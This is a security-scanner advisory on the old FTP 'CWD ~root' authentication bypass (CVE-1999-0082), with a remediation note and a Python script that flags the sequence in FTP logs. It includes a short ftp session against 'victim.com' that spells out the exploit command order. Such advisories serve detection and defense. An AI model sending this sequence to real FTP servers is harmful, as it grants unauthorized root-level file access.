VID 16037
Severity 40
Port 21
Protocol TCP
Class FTP
Detailed Description The CWD ~root command in the FTP server allows root access. Very old versions of the FTP daemon may allow remote users to gain unauthorized access by using the "CWD ~root" command. By issuing a sequence of commands including the "CWD ~root" command, an attacker could bypass authentication on a vulnerable FTP server to gain root permissions and access arbitrary files outside of the FTP root directory with root privileges.
While looking at ftp, you can check for an older bug that was once widely exploited:

% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp@
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)

* Platforms Affected:
FTP Any version

* References:
http://www.iss.net/security_center/static/54.php
http://www.alw.nih.gov/Security/Docs/admin-guide-to-cracking.101.html
Recommendation Replace the vulnerable FTP daemon with a more recent FTP package.

Also, FTP daemons that are vulnerable to this attack are likely to have shipped with older operating systems. Consider upgrading to the latest available operating system supported by your hardware.
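
To check whether the command sequence in the session above has been sent to a server, the following added example (not part of the original advisory) scans FTP command logs for a "CWD ~user" issued before the session received a 230 reply. The log format, the sample lines and the function name find_preauth_cwd are assumptions made for illustration.

```python
import re

# Constructed sample log, format "<session> <C|S> <FTP line>" (an assumption;
# adapt the parser to your daemon's or sensor's real log format).
SAMPLE_LOG = """\
s1 C USER ftp
s1 S 331 Guest login ok, send ident as password.
s1 C CWD ~root
s1 S 530 Please login with USER and PASS.
s1 C PASS ftp@
s1 S 230 Guest login ok, access restrictions apply.
s2 C USER ftp
s2 S 331 Guest login ok, send ident as password.
s2 C PASS ftp@
s2 S 230 Guest login ok, access restrictions apply.
s2 C CWD ~root
s2 S 550 ~root: No such file or directory.
s3 C cwd   ~root
s3 S 530 Please login with USER and PASS.
"""

LINE_RE = re.compile(r"^(\S+)\s+([CS])\s+(.*)$")
CWD_TILDE_RE = re.compile(r"^CWD\s+(~\S*)", re.IGNORECASE)


def find_preauth_cwd(log_text):
    """Return one finding per 'CWD ~user' sent before the session saw a 230."""
    authed = set()      # sessions whose login has completed (reply 230)
    findings = []
    pending = {}        # session -> findings still waiting for a later 230
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue    # skip lines that do not fit the assumed format
        sid, side, text = m.groups()
        if side == "S":
            if text.startswith("230"):
                authed.add(sid)
                # A login that succeeds after the pre-auth CWD completes the
                # sequence from the advisory; mark those findings.
                for f in pending.pop(sid, []):
                    f["login_followed"] = True
            continue
        cwd = CWD_TILDE_RE.match(text)
        if cwd and sid not in authed:
            f = {"session": sid, "target": cwd.group(1), "login_followed": False}
            findings.append(f)
            pending.setdefault(sid, []).append(f)
    return findings
```

Findings with login_followed set to True match the full USER, CWD ~root, PASS order and deserve review first; a CWD sent after a completed login (session s2 in the sample) is not reported.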
Related URL CVE-1999-0082 (CVE)
Related URL (SecurityFocus)
Related URL (ISS)